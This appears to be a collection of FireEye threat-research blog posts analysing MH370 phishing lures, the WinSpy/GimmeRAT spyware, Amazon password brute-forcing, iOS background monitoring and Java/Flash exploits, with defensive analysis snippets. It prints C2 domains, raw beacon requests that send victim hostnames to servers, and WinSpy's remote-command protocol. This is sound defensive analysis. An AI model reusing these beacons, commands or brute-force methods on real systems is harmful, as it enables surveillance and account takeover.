Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy sample discussed above also resolved to two of the same IP addresses, during the same time frame, as the Backdoor.APT.WinHTTPHelper command and control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.
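This kind of infrastructure overlap can be computed directly from passive-DNS data by intersecting the IP sets of the two domains. The resolutions below are placeholders from documentation ranges (the post redacts the real IP addresses):

```python
# Hypothetical passive-DNS records: domain -> set of (ip, first_seen) pairs.
resolutions = {
    "www.verizon.proxydns.com": {("198.51.100.10", "2014-03-07"),
                                 ("198.51.100.11", "2014-03-19"),
                                 ("203.0.113.5",   "2013-08-27")},
    "dpmc.dynssl.com":          {("198.51.100.10", "2014-03-08"),
                                 ("198.51.100.11", "2014-03-19"),
                                 ("203.0.113.9",   "2013-11-01")},
}

# IPs shared by both domains suggest common control of the infrastructure.
shared = ({ip for ip, _ in resolutions["www.verizon.proxydns.com"]} &
          {ip for ip, _ in resolutions["dpmc.dynssl.com"]})
```

Overlapping resolutions in the same time window are a standard pivot for attributing separate campaigns to one group.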

In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.

The Naikon Lures

On March 9, 2014, a malicious executable entitled “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe” (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.

It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend it credibility. This same icon, embedded as a PE resource, has been used in the following recent samples:


MD5                                Import hash                        CnC Server
fcc59add998760b76f009b1fdfacf840   e30e07abf1633e10c2d1fbf34e9333d6   ecoh.oicp[.]net
018f762da9b51d7557062548d2b91eeb   e30e07abf1633e10c2d1fbf34e9333d6   orayjue.eicp[.]net
fcc59add998760b76f009b1fdfacf840   e30e07abf1633e10c2d1fbf34e9333d6   ecoh.oicp[.]net:443
498aaf6df71211f9fcb8f182a71fc1f0   a692dca39e952b61501a278ebafab97f   xl.findmy[.]pw
a093440e75ff4fef256f5a9c1106069a   a692dca39e952b61501a278ebafab97f   xl.findmy[.]pw
125dbbb742399ec2c39957920867ee60   a692dca39e952b61501a278ebafab97f   uu.yahoomail[.]pw
52408bffd295b3e69e983be9bdcdd6aa   a692dca39e952b61501a278ebafab97f   net.googlereader[.]pw
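Rows like these can be clustered on the shared import hash to link samples to a common builder or toolchain. A sketch using truncated values from the table above:

```python
from collections import defaultdict

# (md5, import hash, CnC server) rows from the table above (hashes truncated).
samples = [
    ("fcc59add", "e30e07ab", "ecoh.oicp[.]net"),
    ("018f762d", "e30e07ab", "orayjue.eicp[.]net"),
    ("fcc59add", "e30e07ab", "ecoh.oicp[.]net:443"),
    ("498aaf6d", "a692dca3", "xl.findmy[.]pw"),
    ("a093440e", "a692dca3", "xl.findmy[.]pw"),
    ("125dbbb7", "a692dca3", "uu.yahoomail[.]pw"),
    ("52408bff", "a692dca3", "net.googlereader[.]pw"),
]

# Group unique sample hashes by their import hash.
clusters = defaultdict(set)
for md5, imphash, cnc in samples:
    clusters[imphash].add(md5)
```

Identical import hashes across different MD5s are a strong hint that the binaries were produced from the same source or builder, even when the CnC domains differ.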

This malware leverages “pdfbind” to add a PDF into itself, as can be seen in the debugging strings, and when launched, the malware also presents a decoy document to the target:


The Plat1 Lures

On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins beaconing via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:

C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64)

C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)

The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:

E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdb

F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb

This malware family was also described in more detail here.
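The PDB paths above come from the CodeView debug record the compiler embeds in a PE file. As a rough sketch (a real tool would walk the PE debug directory with a proper parser rather than scanning raw bytes), the path can be pulled out of an "RSDS" record like this:

```python
def extract_pdb_path(data: bytes):
    """Scan a PE file's bytes for a CodeView 'RSDS' debug record and
    return the embedded PDB path, or None.

    Layout after the 'RSDS' signature: 16-byte GUID, 4-byte age,
    then a NUL-terminated path.
    """
    offset = data.find(b"RSDS")
    if offset == -1:
        return None
    start = offset + 4 + 16 + 4           # skip signature, GUID, age
    end = data.index(b"\x00", start)
    return data[start:end].decode("latin-1")

# Synthetic test blob: padding, signature, fake GUID+age, then the path.
blob = (b"\x90" * 32 + b"RSDS" + b"\xAA" * 20 +
        b"E:\\Work\\T5000\\T5 Install\\ResN\\Release\\ResN32.pdb\x00")
```

Because PDB paths often encode project and build-machine directory names, they make durable pivots for finding related samples.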

The Mongall/Saker Lures

Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)


Cache-Control: no-cache

The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:


The “Tranchulas” Lures

On March 18, 2014, a sample entitled “Malysia Airline MH370 hijacked by” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on an IP address that was previously used to host malicious files.

The screensaver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783), which begins beaconing to an IP address that was previously used to host a file (MD5: a4c7c79308139a7ee70aacf68bba814f).

The initial beacon to the command-and-control server is as follows:

POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1


Accept: */*

Content-Length: 11

Content-Type: application/x-www-form-urlencoded

This same control server was used in previous activity.
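The beacon above is easy to flag on the wire because the hostname and username are concatenated into the compname parameter. A hypothetical detection sketch (the sample request line is invented for illustration; hostnames containing underscores would need a smarter split):

```python
import re

# Hypothetical detection rule for the check-in pattern shown above.
BEACON = re.compile(
    r"POST /path_active\.php\?compname=(?P<host>[^_\s]+)_(?P<user>\S+)")

request_line = "POST /path_active.php?compname=WIN7-PC_jsmith HTTP/1.1"
m = BEACON.search(request_line)
```

A rule like this also recovers the compromised hostname and username directly from the traffic, which helps scope an incident.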

The Page Campaign

A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 - FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). It dropped a Backdoor.APT.Page implant and connected outbound on both ports 80 and 443. The initial beacon traffic over port 80 is as follows:

GET /18110143/page_32180701.html HTTP/1.1

Accept: */*

Cookie: XX=0; BX=0

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)


Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache


While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remains popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for spear-phishing campaigns that leverage topics dominating the news cycle.

Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.

From Windows to Droids: An Insight in to Multi-vector Attack Mechanisms in RATs

FireEye recently observed a targeted attack on a U.S.-based financial institution via a spear-phishing email. The payload used in this campaign is a tool called WinSpy, which is sold by the author as a spying and monitoring tool. The features in this tool resemble that of many other off-the-shelf RATs (Remote Administration Tools) available today. We also observed a second campaign by a different attacker where the WinSpy payload was implanted in macro documents to attack various other targets in what appears to be a spam campaign.

The command-and-control (CnC) infrastructure used in the attack against the financial institution is owned and controlled by the author of WinSpy. This does not necessarily mean the author is behind the attack, as the author provides the use of his server for command and control, as well as for storing victim data, as the default option in the WinSpy package. This shared command-and-control infrastructure, advertently or inadvertently, provides another level of anonymity and deniability for the attacker.

While analyzing the Windows payloads for WinSpy, we discovered that it also had Android spying components, which we have dubbed GimmeRAT. The Android tool has multiple components allowing the victim’s device to be controlled remotely by another mobile device over SMS messages, or alternatively through a Windows-based controller. The Windows-based controller is simplistic and requires physical access to the device. The recent surge in Android-based RATs such as Dendroid and AndroRAT shows a spike in the interest of malicious actors in controlling mobile devices. GimmeRAT is another startling example of malicious actors venturing into the Android ecosystem.

Attacks Employing WinSpy

While the WinSpy tool is sold as a spying and monitoring tool for home users, its remote administration capabilities fit the bill for an adversary looking to infiltrate a target organization. The tool also adds another layer of anonymity for the attacker by using the default command-and-control server provided as part of the WinSpy package.

Figure 1 - Mechanism of attack on financial institution employing WinSpy

The attack targeting a U.S. financial institution arrives via a spear-phishing email. The attachment (b430263181959f4dd681e9d5fd15d2a0) in the email is a large NSIS-packed file which, when detonated, displays a screenshot of a pay slip as a decoy to divert the victim’s attention. It also drops and launches various components, as seen in Figure 1 and Figure 2.

Figure 2 - Components of WinSpy

We observed a second attacker using WinSpy in macro documents (78fc7bccd86c645cc66b1a719b6e1258, f496bf5c7bc6843b395cc309da004345) as well as standalone executables (8859bbe7f22729d5b4a7d821cfabb044, 2b19ca87739361fa4d7ee318e6248d05). These arrive either as an attachment or as a link to the payload in emails. The documents had the unique metadata shown below:

File Type        : XLS
MIME Type        : application/
Author           : MR. FRANK
Last Modified By : MR. FRANK
Software         : Microsoft Excel
Create Date      : 2012:02:07 10:41:21
Modify Date      : 2012:02:07 10:41:29
Security         : None
Code Page        : Windows Latin 1 (Western European)
Company          : USER
App Version      : 11.5606

The email attacks were found to have attachment names such as:

Western Union Slip.xls
Money Transfer Wumt.xls

Windows Components

The WinSpy modules are written in Visual Basic and use some freely available libraries such as modJPEG.bas and cJpeg.cls. The components each support various features, as shown below.

Feature                              Component
Webcam monitoring                    RDS.exe
Screen capture & JPEG encoder        RDS.exe
Connectivity check                   RDS.exe
Send victim information to CnC       RDS.exe
FTP exfiltration                     RDS.exe
Status report to CnC                 windns.exe
Email/FTP exfiltration               windns.exe
AV find and kill                     windns.exe
Auto-configure firewall              windns.exe
Keylogging and reports               messenger.exe
Backdoor for remote interaction      rdbms.exe
Microphone recording                 rdbms.exe
Upload/download/execute files        rdbms.exe
File system browser                  rdbms.exe
Execute remote commands              rdbms.exe
Send messages to remote machine      rdbms.exe

The WinSpy malware creates its configuration in the registry under "SOFTWARE\MSI64", as shown in Figure 3. The various components of WinSpy read this configuration at runtime. It dictates settings such as the username, unique identifier, connection parameters, remote FTP server and credentials, filename and path for captured data, current status, etc. The option names in the configuration are abbreviations: for example, "DUNIN" stands for the date to uninstall, "FTSV" for the FTP server, and "FTUS" for the FTP user. The "SID2" value is a unique ID used to identify the infection and is generated at build time.

Figure 3 - WinSpy Configuration
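Because the registry option names are fixed abbreviations, a triage script can annotate a dumped SOFTWARE\MSI64 key. The sketch below decodes only the abbreviations the post explains; unknown keys pass through unchanged, and the sample values are invented:

```python
# Abbreviation meanings taken from the post; keys the post does not
# explain are left as-is rather than guessed.
WINSPY_KEYS = {
    "DUNIN": "date to uninstall",
    "FTSV":  "FTP server",
    "FTUS":  "FTP user",
    "SID2":  "unique infection ID (generated at build time)",
}

def decode_config(raw_config):
    """Annotate a dict of registry values dumped from SOFTWARE\\MSI64."""
    return {WINSPY_KEYS.get(key, key): value for key, value in raw_config.items()}

cfg = decode_config({"FTSV": "ftp.example.net", "FTUS": "uploader", "XXXX": "1"})
```

Recovering the FTP server and credentials from this key also tells a responder exactly where exfiltrated data was sent.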

The WinSpy controller has options to create a new remote file, allowing the attacker to choose various parameters and exfiltration options. Interestingly, the author offers a server he controls as the default command-and-control and exfiltration option.

Figure 4 - WinSpy Builder

The controller has options to retrieve screenshots, keylogs, and various reports from the victim’s machine. It also has the ability to interact with the file system to upload and download files, as well as execute new payloads.

Figure 5 - WinSpy Controller

Figure 6 - WinSpy File Browser

Command and Control

The WinSpy payloads have multiple communication methods for reporting status, attacker interaction, and data exfiltration each of which are described below.

Method 1 - I am online:

The payload reports back to the author’s server on port 14001 to report the victim’s online status with “/P”, and it receives the same command in response as an acknowledgement.

Figure 7 - Online Status

Method 2 - Victim Information:

It also reports back to the WinSpy author’s server on port 27171 using a secondary protocol shown below. The request contains the victim’s IP address as well as the unique identifier generated at build time of the payload. The server responds with a keep-alive.

Figure 8 - Victim Information
Figure 9 - Victim information

Method 3 - SMTP Exfiltration:

It relays keylog data through SMTP if configured. Emails are relayed through an SMTP server running on port 37 on the WinSpy author’s server, using preconfigured authentication parameters. Port 37 is normally assigned to the legacy Time protocol, but in this case the author has repurposed it for SMTP relay. The X-Mailer header “SysMon v1.0.0” sticks out like a sore thumb.

Figure 10 - SMTP Exfiltration
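SMTP traffic on a non-SMTP port combined with the distinctive X-Mailer string makes for a simple heuristic. An illustrative sketch (not a production detection rule):

```python
def looks_like_winspy_smtp(dst_port, headers):
    """Flag SMTP-style traffic on a non-SMTP port that carries the
    WinSpy X-Mailer string (illustrative heuristic only)."""
    smtp_ports = {25, 465, 587}
    return dst_port not in smtp_ports and headers.get("X-Mailer") == "SysMon v1.0.0"

# Mirrors the relay described above: SMTP over port 37 with the odd X-Mailer.
hit = looks_like_winspy_smtp(37, {"X-Mailer": "SysMon v1.0.0"})
```

Either signal alone (odd port, odd X-Mailer) is weak; together they are quite specific to this family.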

Method 4 - FTP Exfiltration:

If configured with a custom FTP server, the WinSpy payload will upload all intercepted data and report to the remote server periodically. The FTP credentials are stored in the registry configuration discussed earlier.

Method 5 - Direct Interaction:

The rdbms.exe module listens on port 443 on the victim’s machine. The attacker can directly connect to this port from the WinSpy controller and issue various commands to download captured data, upload/download files, execute files, send messages, view webcam feeds, etc. Any required data transfer is done over port 444. It supports various commands; the significant ones are shown below. The initial connection command shows that the author plans to implement authentication at some point, but as it stands now, anyone can connect to an infected instance using this command.

Command                Description
/CLUserName.Password.  Initialize connection from controller
/CK                    Acknowledge
/CB{OptionalPath}      Enumerate all files in the root dir or specified path
/CU{FilePath}          Upload specified file
/CD{FilePath}          Download file from specified path
/CD \\\KEYLOGS         Download keylogs
/CD \\\WEBSITED        Download websites-visited detail report
/CD \\\WEBSITES        Download websites-visited summary report
/CD \\\ONLINETIME      Download online time report
/CD \\\CHATROOM        Download chat logs
/CD \\\PCACTIVETIME    Download PC active time report
/RF{FilePath}          Execute remote file in specified path
/WO & /WE              Webcam init and enable
/SO                    Start microphone recording
/AR{Command}           Run command on remote machine
/AM{Message}           Send message to remote machine
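Judging from the command table above, the protocol appears to frame each command as a three-character opcode followed by its argument. A speculative parsing sketch (the framing is inferred, not documented, and the credentials below are invented):

```python
def parse_command(raw):
    """Split a controller command into a three-character opcode and its
    argument. Framing is inferred from the command table; sketch only."""
    opcode, arg = raw[:3], raw[3:]
    if opcode == "/CL":                      # /CLUserName.Password.
        user, password = arg.rstrip(".").split(".", 1)
        return opcode, {"user": user, "password": password}
    return opcode, arg

op, arg = parse_command("/CLadmin.s3cret.")
```

The lack of any session token beyond the plain-text /CL line is what makes the "anyone can connect" observation above so serious.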

Android Components

In the process of investigating the Windows modules for WinSpy, we also discovered various Android components that can be employed for surveillance of a target. We found three different applications that are part of the surveillance package. One of the applications requires commandeering via a Windows controller and requires physical access to the device, while the other two applications can be deployed in a client-server model and allow remote access through a second Android device.

Figure 11 - Deployment Scenarios for Android Components

Windows Physical Controller:

The Windows controller requires physical access to the device and allows the attacker to retrieve screenshots from the infected device. This component is designed to target a victim in physical proximity. The various options available in the Windows controller are shown in Figure 12 below.

Figure 12 - Windows Controller for Android Device


The functionality and structure of the components on the victim’s device are described below in detail.

Component 1 - GlobalService.apk


          a. Services
                    Global Service
          b. Methods

Main activity

The app is started with an intent provided by the desktop Android executable. The intent is a "" intent with an extra field, "interval", which holds a string of the form


The hostname, port, username, and password are used to connect to the attacker's FTP server to send screenshots, which is explained in a later section. Once this intent is received, the GlobalService is restarted with the interval parameter.


This service contains the following variables

         private static final String TAG = "GlobalService";
         private static boolean isScreenON;
         private int mInterval;
         private KeyguardManager mKeyGaurdManager;
         private BroadcastReceiver mPowerKeyReceiver;
         private Timer mSyncTimer;
         private TimerTask mSyncTimerTask;

It goes on to check the value of the isScreenON variable. If the screen is on and if the keyguard has been unlocked, it calls the startScreenCaptureThread() method.

The startScreenCaptureThread method sets the value of the mInterval variable to the value of interval passed to GlobalService. It also sets the properties of the mSyncTimerTask to point to the takeScreenshot method from the ScreenCapturer class such that the thread, when invoked, will take a screenshot every ‘interval’ number of seconds.

The takeScreenshot method in the ScreenCapturer class connects to a native service using a local socket. It connects to port 42345 on localhost. The native service, which is listening on the same port, accepts strings on the socket.

The takeScreenshot method sends a string of the form ‘/data/local/tmp/images/screenshot_DATE.png’ to the underlying native service. The native service checks the string after the last trailing slash “/”; if it begins with “screenshot”, the native service takes a screenshot by issuing the “screencap -p” command. The screenshot is written to the path specified by the string passed as an argument.
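The dispatch decision described above can be modeled in a few lines (a Python sketch of the logic, not the actual native code; function and variable names are ours):

```python
# Model of the native service's request handling: it receives a path string
# over the local socket (port 42345), inspects the component after the last
# "/", and a "screenshot" prefix triggers "screencap -p <path>".

def dispatch(request: str) -> str:
    """Return the shell command the native service would run, or '' if the
    request does not match a known command prefix."""
    basename = request.rsplit("/", 1)[-1]
    if basename.startswith("screenshot"):
        # The screenshot is written to the full path sent by the APK.
        return f"screencap -p {request}"
    return ""

if __name__ == "__main__":
    print(dispatch("/data/local/tmp/images/screenshot_20140101.png"))
```

Because the trigger is just a filename prefix on a local socket, any app on the device that can reach the socket could drive the native service the same way.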

The takeScreenshot method then returns the path of the image to the screenCaptureThread, which calls the FTPService, thereby uploading the screenshot to the attacker's CnC server.

Component 2 - GlobalNativeService

The native service listens on a local socket for commands from GlobalService.apk.

As seen above, if a string whose component after the last trailing slash begins with “screenshot_” is sent to the native service through the socket, it runs the “screencap -p” command in the device's shell and captures a screenshot of the infected device.

The native service also implements other functionality, such as deleting a file and saving FTP information to /data/local/tmp/ftpInformation.

If the string “GPSLocationInfo” is sent to the native service on the local socket, it creates GPSLocations.txt at /data/local/tmp/GPSLocations.txt but does not save the current GPS location. This perhaps indicates an upcoming feature.

Android Remote Controller

Component 1 - GPSTracker.apk 

The startup routine for the GPSTracker class is exactly the same as the one for the GlobalService class. It gets its value from a "StartGPSTracker" intent, which holds the value for an 'interval' variable as an integer. This app records the GPS location of the device at regular intervals (5 minutes). It records a location only if it is at least 200 meters away from the previously recorded location.

When a location is added to the database, all previous locations are deleted; the app therefore maintains only the last known location.
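The bookkeeping just described can be sketched as follows (Python; the class and helper names are ours, and the haversine formula stands in for whatever distance check the app actually uses):

```python
# Sketch of GPSTracker's location logic: a new fix is recorded only if it is
# at least 200 m from the previous one, and recording it discards all earlier
# rows, so only the last known location survives. Illustrative, not decompiled.
import math

MIN_DISTANCE_M = 200.0

def distance_m(lat1, lon1, lat2, lon2):
    """Approximate great-circle distance in metres (haversine)."""
    r = 6371000.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

class LocationStore:
    def __init__(self):
        self.last = None  # only the last known location is ever kept

    def record(self, lat, lon):
        if self.last is not None:
            if distance_m(*self.last, lat, lon) < MIN_DISTANCE_M:
                return False  # too close to the previous fix; ignored
        self.last = (lat, lon)  # previous rows are discarded
        return True
```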

This app monitors all incoming messages. If an SMS beginning with "[gmyl]" (short for (g)ive (m)e (y)our (l)ocation) arrives on the device, the corresponding SMS_RECEIVED intent is aborted and the database is queried. A response SMS is crafted as shown below:


The string “himl” is short for (h)ere (i)s (m)y (l)ocation. Only the last known location is sent as a response to the user.
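A minimal model of this SMS exchange (Python sketch; the reply format beyond the two tags is our assumption, since the source elides the exact message body):

```python
# Model of the GPSTracker SMS protocol: an inbound "[gmyl]" message is
# intercepted and answered with a "[himl]" message carrying the last known
# location. Tag strings come from the analysis; framing is illustrative.

def handle_sms(body, last_location):
    """Return the reply SMS for a [gmyl] query, or None for ordinary SMS
    (in which case the SMS_RECEIVED intent would not be aborted)."""
    if not body.startswith("[gmyl]"):
        return None
    lat, lon = last_location  # only the last known location is stored
    return f"[himl] {lat},{lon}"
```

As noted below, nothing in this exchange authenticates the sender, so the tag string alone is enough to query an infected device.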

Component 2 - GPSTrackerClient.apk

This app acts as the controller to the GPSTracker.apk. While the GPSTracker.apk is installed on the victim's device, the GPSTrackerClient.apk is installed on the device from which the monitoring takes place. It takes the phone number of the phone to be tracked and sends it an SMS that contains "[gmyl]". The GPSTracker.apk then responds with the location in an SMS message as described in the above section. It then uses the native maps functionality, i.e., Google Maps, to point to the location sent by GPSTracker.

It is also worth noting that the two modules do not authenticate each other in any way; as a result, any device infected with GPSTracker.apk can be controlled by anyone who sends SMS messages with the expected structure.


These attacks and tools reaffirm that we live in an age of digital surveillance and intellectual property theft. Off-the-shelf RATs have proliferated over the years, and attackers rely on them increasingly. With the widespread adoption of mobile platforms such as Android, a market has emerged for RATs that support these platforms. We will continue to see RAT implementations and payloads for multiple platforms, and attackers will continue to take advantage of these new attack surfaces to infiltrate their targets.

The 2013 FireEye Advanced Threat Report!

FireEye has just released its 2013 Advanced Threat Report (ATR), which provides a high-level overview of the computer network attacks that FireEye discovered last year.

In this ATR, we focused almost exclusively on a small, but very important subset of our overall data analysis – the advanced persistent threat (APT).

APTs, due to their organizational structure, mission focus, and likely some level of nation-state support, often pose a more serious danger to enterprises than a lone hacker or hacker group ever could.

Over the long term, APTs are capable of cyber attacks that can rise to a strategic level, including widespread intellectual property theft, espionage, and attacks on national critical infrastructures.

The data contained in this report is gleaned from the FireEye Dynamic Threat Intelligence (DTI) cloud, and is based on attack metrics shared by FireEye customers around the world.

Its insight is derived from:

  • 39,504 cyber security incidents
  • 17,995 malware infections
  • 4,192 APT incidents
  • 22 million command and control (CnC) communications
  • 159 APT-associated malware families
  • CnC infrastructure in 206 countries and territories


Based on our data, the U.S., South Korea, and Canada were the top APT targets in 2013; the U.S., Canada, and Germany were targeted by the highest number of unique malware families.

The ATR describes attacks on 20+ industry verticals. Education, Finance, and High-Tech were the top overall targets, while Government, Services/Consulting, and High-Tech were targeted by the highest number of unique malware families.

In 2013, FireEye discovered eleven zero-day attacks. In the first half of the year, Java was the most common target for zero-days; in the second half, FireEye observed a surge in Internet Explorer (IE) zero-days that were used in watering hole attacks, including against U.S. government websites.

Last year, FireEye analyzed five times more Web-based security alerts than email-based alerts – possibly stemming from an increased awareness of spear phishing as well as a more widespread use of social media.

In sum, the 2013 ATR offers strong evidence that malware infections occur within enterprises at an alarming rate, that attacker infrastructure is global in scope, and that advanced attackers continue to penetrate legacy defenses, such as firewalls and anti-virus (AV), with ease.

Amazon’s Mobile Shopping Clients and CAPTCHA

Amazon is a popular online retailer serving millions of users. Unfortunately, FireEye mobile security researchers have found security issues within Amazon’s mobile apps on both Android and iOS platforms through which attackers can crack the passwords of target Amazon accounts. Amazon confirmed our findings and hot fixed the issue.

Recently, we found two security issues within Amazon’s mobile apps on both Android and iOS platforms:

  • No limitation or CAPTCHA for password attempts
  • Weak password policy

Attackers can exploit these two security issues remotely against target Amazon accounts.

Figure 1. Verification Code for Wrong Password Attempts

A CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart") is a challenge-response test designed to determine whether the user is a human. CAPTCHAs are well adopted for preventing programmed bots from accessing online services for bad purposes, such as conducting denial-of-service attacks, harvesting information and cracking passwords.

The web version of Amazon requires the user to complete a CAPTCHA after ten incorrect password attempts (Figure 1), to prevent password cracking. However, Amazon’s mobile apps haven’t adopted such protection using CAPTCHA (Figure 2 and Figure 3). This design flaw provides attackers the chance to crack any Amazon account’s password using brute force.

Figure 2. Amazon Android App

Figure 3. Amazon iOS App

Furthermore, Amazon doesn’t have a strong password strength requirement. It accepts commonly used weak passwords such as "123456" and "111111". The weaker the password, the easier it is for hackers to break into an account, so allowing weak passwords exposes accounts to unnecessary risk. Given the many well-known password leaks, attackers can use leaked password lists as dictionaries for password cracking.

As a proof of concept, we cracked the password of one Amazon account we set up within 1,000 attempts, using the latest version (2.8.0) of Amazon’s Android shopping client.

After receiving our vulnerability report, Amazon hot fixed the first issue by patching their server. Now, if a user tries multiple incorrect passwords, the server will block further login attempts (Figure 4). Going forward, we suggest adding CAPTCHA support to Amazon’s mobile (Android and iOS) apps and enforcing stronger password requirements.
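The server-side fix amounts to a lockout counter per account. A minimal sketch of that idea (Python; the threshold of ten mirrors the web CAPTCHA trigger described earlier, but Amazon's actual mobile limit is not published):

```python
# Illustrative server-side lockout: after MAX_ATTEMPTS consecutive wrong
# passwords, further login attempts for that account are rejected outright.
# Threshold and names are our assumptions, not Amazon's implementation.

MAX_ATTEMPTS = 10

class LoginThrottle:
    def __init__(self):
        self.failures = {}  # account -> consecutive wrong-password count

    def attempt(self, account, password_ok):
        if self.failures.get(account, 0) >= MAX_ATTEMPTS:
            return "blocked"  # account locked; even a correct password fails
        if password_ok:
            self.failures[account] = 0  # success resets the counter
            return "ok"
        self.failures[account] = self.failures.get(account, 0) + 1
        return "wrong-password"
```

This is why the brute-force approach in the proof of concept stops working after the patch: the attacker's guess budget per account is capped.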

Figure 4. Wrong Password Block

Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation

Background monitoring by mobile applications has become a hot topic. Existing reports show that such monitoring can be conducted on jailbroken iOS devices. FireEye mobile security researchers have discovered such a vulnerability, and found approaches to effectively bypass Apple's app review process and successfully exploit non-jailbroken iOS 7 devices. We have been collaborating with Apple on this issue.


Fig.1 Background Monitoring

We have created a proof-of-concept "monitoring" app on non-jailbroken iOS 7.0.x devices. This “monitoring” app can record all user touch/press events in the background, including touches on the screen, Home button presses, volume button presses, and TouchID presses, and then send all user events to any remote server, as shown in Fig.1. Potential attackers can use this information to reconstruct every character the victim inputs.

Note that the demo exploits the latest 7.0.4 version of iOS system on a non-jailbroken iPhone 5s device successfully. We have verified that the same vulnerability also exists in iOS versions 7.0.5, 7.0.6, and 6.1.x. Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring.


Fig.2 Background App Refresh Settings


Fig.3 Killing An App on iOS7

iOS7 provides settings for "background app refresh". Disabling unnecessary apps' background refresh helps prevent potential background monitoring. However, this protection can be bypassed. For example, an app can play music in the background without turning on its "background app refresh" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring.

Until Apple fixes this issue, the only way for iOS users to avoid this security risk is to use the iOS task manager to stop apps from running in the background. iOS7 users can press the Home button twice to enter the task manager and see preview screens of open apps, then swipe an app up and out of the preview to stop unnecessary or suspicious applications running in the background, as shown in Fig.3.

We conducted this research independently before we were aware of this recent report. We hope this blog could help users understand and mitigate this threat further.

Acknowledgement: Special thanks to Jari Salomaa for his valuable comments and feedback. We also thank Raymond Wei, Dawn Song, and Zheng Bu for their valuable help on writing this blog.

Write Once, Exploit Everywhere: FireEye Report Analyzes Four Widely Exploited Java Vulnerabilities

Over the last couple of decades, Java has become the lingua franca of software development, a near-universal platform that works across different operating systems and devices. With its “write once, run anywhere” mantra, Java has drawn a horde of developers looking to serve a large user base as efficiently as possible.

Cyber attackers like Java for many of the same reasons. With a wide pool of potential targets, the platform has become the vehicle of choice for quickly dispersing lucrative crimeware packages.

In our continuing mission to equip security professionals against today’s advanced cyber threats, FireEye has published a free report, “Brewing Up Trouble: Analyzing Four Widely Exploited Java Vulnerabilities.” The report outlines four commonly exploited Java vulnerabilities and maps out the step-by-step infection flow of exploits kits that leverage them.

Download the paper to learn more about these vulnerabilities:

  • CVE-2013-2471, which allows attackers to override Java’s getNumDataElements() method, leading to memory corruption.
  • CVE-2013-2465, which involves insufficient bounds checks in the storeImageArray() function. This vulnerability is used by White Lotus and other exploit kits.
  • CVE-2012-4681, which allows attackers to bypass security checks using the findMethod() function.
  • CVE-2013-2423, which arises from insufficient validation in the findStaticSetter() method, leading to Java type confusion. This vulnerability is employed by RedKit and other exploit kits.

As explained in the paper, Java’s popularity among developers and its widespread use in Web browsers all but guarantee continuing interest from threat actors.

Motivated by profits, cyber attackers are bound to adopt more intelligent exploit kits. And these attacks will continue to mushroom as more threat actors scramble for a piece of the crimeware pie.

Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit

Less than a week after uncovering Operation SnowMan, the FireEye Dynamic Threat Intelligence cloud has identified another targeted attack campaign — this one exploiting a zero-day vulnerability in Flash. We are collaborating with Adobe security on this issue. Adobe has assigned the CVE identifier CVE-2014-0502 to this vulnerability and released a security bulletin.

As of this blog post, visitors to at least three nonprofit institutions — two of which focus on matters of national security and public policy — were redirected to an exploit server hosting the zero-day exploit. We’re dubbing this attack “Operation GreedyWonk.”

We believe GreedyWonk may be related to a May 2012 campaign outlined by ShadowServer, based on consistencies in tradecraft (particularly with the websites chosen for this strategic Web compromise), attack infrastructure, and malware configuration properties.

